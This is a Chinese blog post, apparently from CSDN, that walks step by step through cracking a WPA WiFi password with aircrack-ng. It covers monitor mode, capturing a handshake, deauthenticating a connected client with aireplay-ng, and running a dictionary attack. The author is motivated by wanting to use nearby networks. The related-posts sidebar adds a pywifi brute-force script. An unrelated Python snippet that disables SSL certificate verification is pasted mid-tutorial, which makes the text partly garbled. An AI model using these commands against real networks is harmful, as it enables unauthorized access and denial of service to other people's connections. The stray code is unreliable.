WiFi爆破实战

置顶 已于 2024-02-03 20:41:14 修改
阅读量1k 收藏 11
点赞数
分类专栏: 实战打靶集锦 渗透测试 网络安全 文章标签: WiFi爆破 无线网络攻击 WLAN攻击实战 无线攻击实战
于 2023-08-02 23:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lipeixinglive/article/details/132056875
版权

提示:本文记录了博主的一次WiFi爆破实战

文章目录

写在前面

提示:这里仅用作安全测试和渗透测试中的技术交流,读者切勿用来做非法的事情,博主概不负责。

因为职业原因,在外面我从来不连接公共WiFi,都是用自己的流量上网。最近出差频繁导致流量告急,就在想是否可以爆破一个附近的相对安全一点的WiFi,蹭点流量呢?于是上网开始搜索,教程到真是不少,但是需要一个可用来做监听的无线网卡,可惜我手头没有。
因为职业的原因,这件事就在心中发芽了,家里前几年买了个免驱的USB无线网卡,打算出差回家就折腾一下下。出差回家后,翻箱倒柜,找到无线网卡,开始动手,这就是这篇文章的由来。

一、将网卡连接Kali虚拟机

我的Kali是安装在Windows的VMWare下的虚拟机,启动Kali虚拟机,插入无线网卡。这时候VMWare会弹出如下图所示的提示信息。
在这里插入图片描述
选择“连接到虚拟机”,并且在虚拟机列表中选择要连接的Kali,然后点击确定按钮。
接下来看看Kali是不是可以搜索到附件的无线信号。
在这里插入图片描述
额,各种重启、各种折腾,发现始终无法开启无线连接。上网搜索了一下,发现我的姥爷无线网卡在Windows下是免驱的,在Linux下不是免驱的,那就接下来找对应的Linux版本驱动吧。
通过插拔USB无线网卡,并在Kalil下通过lsusb -tv命令可以识别到无线网卡的ID信息,如下图所示。
在这里插入图片描述
个人理解,冒号前面的四位十六进制是貌似是厂家ID,后面四位是型号ID。具体的型号是第二行显示的MT7601U。直接根据ID中的148f和7601从www.linux-usb.org/usb.ids上查找型号,确认是不是MT7601U。
在这里插入图片描述
这次稳了,就是这个型号,直接去官网(https://www.mediatek.com/products/broadband-wifi/mt7601u)找驱动源码。

下载对应的驱动源码包DPO_MT7601U_LinuxSTA_3.0.0.4_20130913.tar.bz2。
在这里插入图片描述
解压驱动包

$ tar -jxvf DPO_MT7601U_LinuxSTA_3.0.0.4_20130913.tar.bz2

然后编辑安装。
在这里插入图片描述
各种变异失败,重新再Git上搜索驱动,也没有一个可用的,折腾了一个下午放弃。直接从京东上买了一个kali免驱的监听无线网卡,几十块钱,基本上标准kali监听都可以直接用,不用额外安装驱动。接下来就是焦急等待到货。
无线网卡到货后迫不及待试了一下,果然很顺畅,kali直接识别了,并且搜索到了附近的WiFi。
在这里插入图片描述

二、网卡配置骤

2.1 识别网卡

通过ifconfig看一下是不是能够正常识别到(肯定是可以的,因为前面都已经搜索到信号了)。
在这里插入图片描述
没有任何问题,在用iwconfig确认一下(我的强迫症又犯了)。
在这里插入图片描述

2.2 净化环境

通过下面的命令,清除一下系统中可能影响WiFi监听的进程。

$ sudo airmon-ng check kill

代码如下(示例):

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
import  ssl
ssl._create_default_https_context = ssl._create_unverified_context

在这里插入图片描述

2.3 启动监听

通过下面的命令启动监听。

$ sudo airmon-ng start wlan0

在这里插入图片描述
通过下面的命令检查一下是否开启监听成功。

$ iwconfig

在这里插入图片描述
如上图所示,无线网卡的别名变成了wlan0mon,并且Mode显示未Monitor,说明开启监听成功了。

2.4 探测周边WiFi

通过下面的命令开始探测周边的WiFi。

$ sudo airodump-ng wlan0mon

在这里插入图片描述
还挺多的,各种信息一目了然啊,BSSID是无线路由器的MAC地址,PWR是对应的信号强度(绝对值越小信号越强),CH是当前的信道编号,等等。为了讲清楚逻辑原理,我们直接使用自己的已知密码的WiFi。

三、实施攻击

3.1 对选定的目标WiFi实施监听

$ sudo airodump-ng --bssid F4:2A:7D:2A:9D:11 -c 12 -w ~/Desktop/test20230802002-01 wlan0mon

这里说明一下,–bssid后面跟的是目标WiFi的BSSID,-c后面跟的是目标WiFi的信道编号, -w后面跟的是监听抓包的存放位置(这里我们直接放在桌面,文件明是test20230802002-01)。

在这里插入图片描述
如上图所示,最后一行的STATION列显示的就是当前连接到目标WiFi上的设备的MAC地址,当前的WiFi还是比较稳定的,丢包率Lost为0。

3.2 发起DOS攻击

通过下面的命令,对WiFi发起DOS工具,似的连接到WiFi上的设备无法正常联网。

$ sudo aireplay-ng -0 1000 -a F4:2A:7D:2A:9D:11 -c F4:84:8D:C8:A0:4E wlan0mon

在这里插入图片描述
上面的命令中,-a后面跟的是目标WiFi的MAC地址,-c后面跟的是某个选定的连接到该WiFi的设备的MAC地址。开启DOS攻击后,网络的丢包率飙升,并且还出现的WPA handshake(重新握手,我们需要的就是这个握手包)。
在这里插入图片描述
到这里可以停止监听和停止DOS攻击了。

3.3 实施爆破

因为这里只是展示原理和可行性,我手工随便构建了一个用于爆破的WiFi密码字典(网上有很多,大家可以自行下载使用),顺便把我们目标WiFi的密码也写到了WiFi密码字典中,接下来我们就用这个WiFi字典对用刚才的WiFi握手包进行爆破。

$ sudo aircrack-ng -w ~/Desktop/wifi-dic.txt ~/Desktop/test20230802002-01.cap

说明一下,-w后面跟的是我们选定的用于爆破的WiFi密码字典,在后面跟的是我们刚才监听目标WiFi过程中抓获的包括握手报文的抓包文件。
在这里插入图片描述
分分钟就爆破成功了。实战过程中,这依赖于我们的WiFi字典,高质量的字典会直接导致我们的爆破成功率飙升。

写在最后

这里再重申一遍,本文只做技术交流,并提醒大家设置健壮的WiFi密码,使用安全的WiFi协议,希望读者不要用本文内容干非法的事情。

骈邑老李
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
无线网络密码爆破
weixin_45396639的博客
03-25 3062
无线网络密码爆破 1.无线网络: 无线网络的组成: 通常情况下,无线网络是由路由器和无线客户端组成的。我们通常称路由器为AP(Access Point,接入点);无线客户端为STA(Station)。 在一个无线网络中至少有一个AP和一个或多个STA。 无线网络的工作流程: 因为AP自动广播SSID,所以STA可监听AP发出的信号。当STA加入无线网络时,会发送一个探测请求。当AP收到请求时,回应一个含频带信息的相应包。之后,STA切换到指定频道。 STA提供密码认证该无线网络。当AP验证STA提
2021-2022最全wifi爆破字典成功率很高85%
05-06
2021-2022最全wifi爆破字典成功率很高85%,里面包含了0-9的8位纯数字,还包含了姓式+生日,还有自己整理的一些字典在里面。一共6.3个G,东西不大,希望能给帮助你们。请非法使用,
wifi密码爆破和中间人攻击
07-26
这篇文章主要讲解wifi密码爆破和中间人攻击。使用的工具有aircrack-ng套件和MITMf中间人攻击框架。
破解隔壁wifi的实践——网络攻击,抓取握手包,解包
最新发布
qq_53058639的博客
03-09 1810
两种思路的方法:1,python脚本试密码2,网络攻击,抓取握手包,解包。本篇博客介绍 网络攻击,抓取握手包,解包。这个思路的方法,目前为止碍于我硬件的问题我也还没有成功,我将整个过程的思路和遇到的坑,以及中间过程收集到的资源分享出来,供参考借鉴。
pkav验证码爆破工具
05-14
pkav验证码爆破工具
kali可用!MT7601U无线wifi驱动
01-11
MT7601U无线wifi驱动,亲测KALI可用
Kali Linux中的十大WiFi攻击工具介绍
weixin_72849553的博客
12-23 2500
oclHashcat不是一个专门用于Wifi破解攻击的工具,它不包括在Kali Linux中,但它可以在使用GPU时非常快速地对捕获的握手数据包进行暴力破解和字典攻击。使用带有oclHashcat的GPU,而不是带有Aicrack-ng的CPU,因为这样可以加快破解密码的过程。相反,Macchanger是一个非常小的实用程序,可以用来欺骗你的MAC地址到一个随机的MAC地址,或者你可以指定为你自己想指定的。它将捕获WPA握手数据包,自动取消对进行连接的客户端的身份验证,欺骗你的MAC地址并安全的破解密码。
一个非常简单易懂的WIFI密码爆破python脚本
weixin_33701564的博客
01-08 488
为什么80%的码农都做不了架构师?>>> ...
kali爆破wifi密码测试
qq_54929422的博客
01-22 1287
aireplay-ng -0 0 -a 路由器的mac -c 连接设备的mac wlan0mon。下面D2:99:EE:FD:F8:7E是正在连接改wifi的设备MAC。CH是信道,就像车道一样,如果1车道车满了,就可以去2车道,以此类推。首先,我们要有一个能连接Linux虚拟机,并且能监听网络的无线网卡。声明:只做密码爆破学习,不用于破坏,本文测试的是自己的wifi。发现wlan0的名字变成了wlan0mon,变成了监听模式。重新打开一个界面(因为前面的监听不能停),输入命令。出现vlan0就是已识别。
无线网卡+kali实现wifi暴力破解(密码爆破方式)
热门推荐
qq_43006864的博客
03-31 1万+
攻击机:kali 所采用的的无线网卡:D-LINK 采用的工具:Aircrack-ng 测试开始: 首先,打开kali,将无线网卡插入。弹出提示窗口,这里选择连接到虚拟机,选择kali虚拟机。 然后点击网络连接的标志,可以看到当前环境的wifi列表。 使用命令ifconfig和iwconfig,都可以看到wlan0已开启。 现在开始爆破。 这里的字典是我自己常用的,大家可以自行寻找字典。 (1)清除进程:airmon-ng check kall (2)开启监听
kali破解WiFi
李木一的博客
03-05 639
仅仅是做个笔记airmon-ng start wlan0(启动网卡监听模式)启动后ifconfig查看一下,如果网卡名加上了mon后则成功,(wlan0mon)airodump-ng wlan0mon  (airodump-ng后接网卡名,去扫面周围wifi的信息,ctrl+c停止)简单看下参数: BSSID:路由的MAC地址。 PWR:信号强度,越小信号越强。 #Data:传输的数据,大的可能在...
windows版本的wifi密码破解
11-26
傻瓜化的无线密码获取器,一键搜索附近无线网络。
wifi暴力破解
03-13
wifi暴力破解器是一款破解路由器密码的工具。随着手机越来越使用平凡,使用的方式也多了起来,而这些都是需要流量的,所以wifi就在这个时候出现了
WIFI密码暴力破解
04-10
暴力破解 在设置中可以选择中文 可使用GPU加速
WIFI暴力破 解
12-09
WIFI暴力破解
wifi密码暴力破解器
06-18
傻瓜式暴力破解wifi密码安卓版用了才知道
Python3下的WIFI密码爆破源码
05-05
Python3下的WIFI密码爆破源码
爆破字典.txt
05-13
文件的百度云网址为链接: https://pan.baidu.com/s/1hbS3j9pSmnIjfTp2RKWPlA, 提取码:见资源文件爆破字典.txt。...4)爆破字典 1.7M 5)完美字典_triom发布_v09_工9.4亿条,无重复,无中文,8-16位,文件大小---1.66G
前端入职第一天该做什么?
laoli360的博客
10-25 5663
嘿嘿 很多学习的同志们 上岸了 拿到自己心仪的offer 准备入职 如果是第一次入职 难免会有很多的好奇和担忧,为了避免各位第一天麻爪,让别人感觉自己很low 这里我会描述入职第一天需要做什么,这里结合本人和网络上其他工作了数年前端经验的前端攻城的经验 对入职第一天需要做的事情进行总结: 数据来源于网络 如有侵权 请第一时间私信我,我会及时删除. 入职欢迎仪式 签订入职协议 新人入职培训 配置开发环境 开通相关账号 熟悉公司规范 熟悉项目代码 入职欢迎仪式 新..
python wifi 爆破字典代码
11-11
以下是使用pywifi模块进行wifi爆破的Python代码示例: ```python import pywifi from pywifi import const # 设置要破解的wifi名称和字典文件路径 ssid = "wifi_name" path = "passwords.txt" # 创建一个无线对象 wifi = pywifi.PyWiFi() # 获取第一个无线网卡 iface = wifi.interfaces()[0] # 断开无线网卡连接 iface.disconnect() # 开启监控 iface.monitor_mode = True # 开始抓包 iface.scan() # 获取扫描结果 results = iface.scan_results() # 遍历扫描结果,查找目标wifi target_wifi = None for result in results: if result.ssid == ssid: target_wifi = result break # 如果找到目标wifi if target_wifi: # 读取字典文件 with open(path, "r") as f: passwords = f.readlines() # 遍历字典文件中的密码 for password in passwords: # 去除密码两端的空格和换行符 password = password.strip() # 创建wifi连接文件 profile = pywifi.Profile() profile.ssid = ssid profile.auth = const.AUTH_ALG_OPEN profile.akm.append(const.AKM_TYPE_WPA2PSK) profile.cipher = const.CIPHER_TYPE_CCMP profile.key = password # 删除所有wifi连接文件 iface.remove_all_network_profiles() # 添加新的wifi连接文件 tmp_profile = iface.add_network_profile(profile) # 连接wifi iface.connect(tmp_profile) # 等待连接结果 while iface.status() == const.IFACE_CONNECTING: pass # 判断是否连接成功 if iface.status() == const.IFACE_CONNECTED: print("Success! Password is: ", password) break else: print("Failed! Password is: ", password) # 如果没有找到目标wifi else: print("Target wifi not found!") ``` 该代码使用pywifi模块实现了wifi爆破功能,具体步骤如下: 1. 设置要破解的wifi名称和字典文件路径。 2. 创建一个无线对象。 3. 获取第一个无线网卡。 4. 断开无线网卡连接。 5. 开启监控。 6. 开始抓包。 7. 获取扫描结果。 8. 遍历扫描结果,查找目标wifi。 9. 如果找到目标wifi,读取字典文件,遍历字典文件中的密码。 10. 创建wifi连接文件,删除所有wifi连接文件,添加新的wifi连接文件,连接wifi。 11. 等待连接结果,判断是否连接成功。 12. 如果连接成功,输出密码并结束程序;如果连接失败,继续尝试下一个密码。 13. 如果没有找到目标wifi,输出提示信息并结束程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值